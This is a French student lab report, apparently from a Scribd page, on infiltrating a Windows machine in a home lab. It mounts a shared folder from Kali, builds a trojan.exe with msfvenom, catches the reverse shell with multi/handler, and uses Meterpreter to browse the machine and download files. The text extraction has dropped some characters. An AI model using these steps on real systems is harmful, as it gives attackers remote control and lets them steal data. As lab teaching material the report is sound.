0% ont trouvé ce document utile (0 vote)
299 vues11 pages

PAYLOAD

Le document décrit comment transférer un payload vers une machine Windows afin d'infiltrer la cible. Il explique l'utilisation de msfvenom pour créer un fichier exécutable malveillant, puis le transfert et l'exécution du fichier sur la machine Windows cible pour obtenir un shell Meterpreter.
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
299 vues11 pages

PAYLOAD

Le document décrit comment transférer un payload vers une machine Windows afin d'infiltrer la cible. Il explique l'utilisation de msfvenom pour créer un fichier exécutable malveillant, puis le transfert et l'exécution du fichier sur la machine Windows cible pour obtenir un shell Meterpreter.
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

PAYLOAD

Juan Carlos Contreras Ramirez V1 Page 1/11

Table des matières


Transférer une charge u le (payload) vers une machine Windows ........................................................ 2
Transférer un payload vers une machine Windows ............................................................................ 2
Create Your First Trojan and Infiltrate a Target .................................................................................... 5

Juan Carlos CONTRERAS RAMIREZ 1 BACHELOR AIS 2023-2024


PAYLOAD
Juan Carlos Contreras Ramirez V1 Page 2/11

Transférer une charge utile (payload) vers une machine Windows

Transférer un payload vers une machine Windows


Nous allons créer un dossier sur notre machine Windows

On va le partager, pour cela on fait un clic droit sur le dossier, on clique sur propriétés.

Dans la nouvelle fenêtre, clique sur 1 "Partage" et puis 2 "Partager…"

Dans la nouvelle fenêtre, déployer le menu déroulent et choisir "Tout le monde" con nuer en
cliquant sur " Ajouter "et finaliser par "Partager"

Juan Carlos CONTRERAS RAMIREZ 2 BACHELOR AIS 2023-2024


PAYLOAD
Juan Carlos Contreras Ramirez V1 Page 3/11

Sur tout le monde, cliquer sur le menu déroulant et sélec onner "Lecture/écriture" et valider par
"Partager"

Et sur "terminé"

Nous allons maintenant accéder à un terminal sur notre machine Kali.

Pour pouvoir monter, nous devons installer les services de fichiers de l'Internet commun.

Nous lançons la commande sudo apt-get install cifs-utils.

Juan Carlos CONTRERAS RAMIREZ 3 BACHELOR AIS 2023-2024


PAYLOAD
Juan Carlos Contreras Ramirez V1 Page 4/11

Créer un nouveau dossier et on l'appelle "winmount”, pour ce faire.

Faire un clic droit sur le bureau de notre KALI

Ensuite nous faisons un mount.cifs avec le chemin de notre dossier de la machine Windows et le
chemin du dossier de la KALI

sudo mount.cifs //DESKTOP-CCHDAOV/Users/jccr/Desktop/tomount


/home/jccr/Bureau/winmount -o user=jccr

Dans mon cas j'ai eu un souci de DNS et j'ai dû me re l'adresse IP de ma machine Windows et
désac ver le pare-feu

sudo mount.cifs //192.168.1.10/Users/jccr/Desktop/tomount


/home/jccr/Bureau/winmount -o user=jccr

Juan Carlos CONTRERAS RAMIREZ 4 BACHELOR AIS 2023-2024


PAYLOAD
Juan Carlos Contreras Ramirez V1 Page 5/11

On renseigne le mot de passe de l'u lisateur de la machine Windows

En créant un fichier dans "tomount" nous le voyons dans le dossier "winmount"

Create Your First Trojan and Infiltrate a Target

Nous allons exploiter Windows.

Lancer la console msfconsole

Nous allons créer un programme exécutable malveillant la charge u le pour l'hôte cible et puis nous
allons exécuter ce fichier sur l'hôte cible et il va effec vement exposer son shell.

Maintenant, u lisons la commande appelée msfvenom, msfvenom est une combinaison de deux
commandes qui existent dans Metasploit qui sont msf payload et msf encode. Elles sont maintenant
toutes deux réunies en une seule commande.

Auparavant, la commande msf payload était u lisée pour générer la charge u le sous une forme
spécifique et la commande msf encode était u lisée pour encoder la charge u le à l'aide de différents
algorithmes. Désormais, vous pouvez u liser une seule commande pour effectuer les deux ac ons.
Après cela, vous spécifiez la charge u le avec switch -p ici nous allons u liser windows, meterpreter,
reverse_TCP. Donc c'est la charge u le que nous allons u liser comme nous l'avons dit, la vic me va
nous exposer son shell et nous serons en mesure de contrôler à distance, nous allons spécifier Local

Juan Carlos CONTRERAS RAMIREZ 5 BACHELOR AIS 2023-2024


PAYLOAD
Juan Carlos Contreras Ramirez V1 Page 6/11

Host IP qui est mon IP et ensuite je vais spécifier le Port local qui est vous pouvez choisir n'importe
quel point.

On choisira 5555 et ensuite -F qui est l'extension de fichier qu'on u liserai pour générer ce e charge
u le, c'est-à-dire exe. Puis -e, qui spécifie l'encodeur. Il y a beaucoup d'encodeurs. Et on ajoute -i
pour spécifier le nombre d'interac ons que cet encodeur effectuera sur ce e charge u le.

On sélec onne 10 ac va ons et on crée un fichier appelé trojan.exe. Et on l'exécute

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=5555 -


f exe x86/shikata_ga_nai -i 10 > trojan.exe

Maintenant, nous sommes prêts à transférer le fichier à la machine de la vic me et à le réaliser.

Le système visé sera complètement compromis et pourra être contrôlé à distance, pour nous
perme re d'exécuter n'importe quel type de commande à distance nous allons u liser Meterpreter.

Nous allons copier le fichier que nous venons de créer et on le déplace vers ma machine Windows
mount

sudo cp /home/jccr/trojan.exe /home/jccr/Bureau/winmount

Juan Carlos CONTRERAS RAMIREZ 6 BACHELOR AIS 2023-2024


PAYLOAD
Juan Carlos Contreras Ramirez V1 Page 7/11

Dans la machine Windows on double clic sur le trojan.exe

Maintenant, nous allons sur notre machine Kali et nous allons juste saisir ce e commande "use" pour
sélec onner le module que nous voulons u liser dans Metasploit.

Dans notre cas, nous allons exploiter "mul /handler"

use multi/handler

Juan Carlos CONTRERAS RAMIREZ 7 BACHELOR AIS 2023-2024


PAYLOAD
Juan Carlos Contreras Ramirez V1 Page 8/11

Après on fait

set payload windows/meterpreter/reverse_tcp

Ensuite nous allons changer le LHOST et le LPORT

On fait un show op ons pour vérifier

On lance notre exploit voir ici que ce e session a démarré une connexion inversée à l'adresse IP qui
est notre adresse IP.

Juan Carlos CONTRERAS RAMIREZ 8 BACHELOR AIS 2023-2024


PAYLOAD
Juan Carlos Contreras Ramirez V1 Page 9/11

Et on retourne sur la machine Windows et on fait double clic sur le trojan.exe une session
Meterpreter s'ouvrira entre la machine Windows et notre machine Kali.

Maintenant, nous avons un shell ici que nous pouvons u liser pour faire ce que nous voulons.
Commençons par u liser "help".

Vous pouvez voir toutes les commandes que vous pouvez exécuter dans Meterpreter. C'est très
important de commencer par taper "help" et il vous guidera à travers toutes les commandes.

Par exemple, si on u lise la commande " sysinfo " on peut obtenir ces informa ons et voir le
système et la version de Windows 10.

Juan Carlos CONTRERAS RAMIREZ 9 BACHELOR AIS 2023-2024


PAYLOAD
Page 10
Juan Carlos Contreras Ramirez V1
/11

"ls" pour lister les fichiers du répertoire

On peut aussi u liser "ipconfig" pour voir la configura on du réseau de la machine distante

La commande "search" pour rechercher n'importe quel fichier sur ce e machine distante

Juan Carlos CONTRERAS RAMIREZ 10 BACHELOR AIS 2023-2024


PAYLOAD
Page 11
Juan Carlos Contreras Ramirez V1
/11

Si on veut télécharger un fichier

download C:/Users/jccr/Downloads/PC-Isabelle.pdf

La commande "upload" est très importante car nous pouvons envoyer de fichiers ou ce qu'on veut
vers notre machine piégée

Le fichier txt Hobbit.txt il n'est jamais allé dans c:\\windows\system32, j'ai refait le test en créant un
dossier test a la racine.

Juan Carlos CONTRERAS RAMIREZ 11 BACHELOR AIS 2023-2024

Vous aimerez peut-être aussi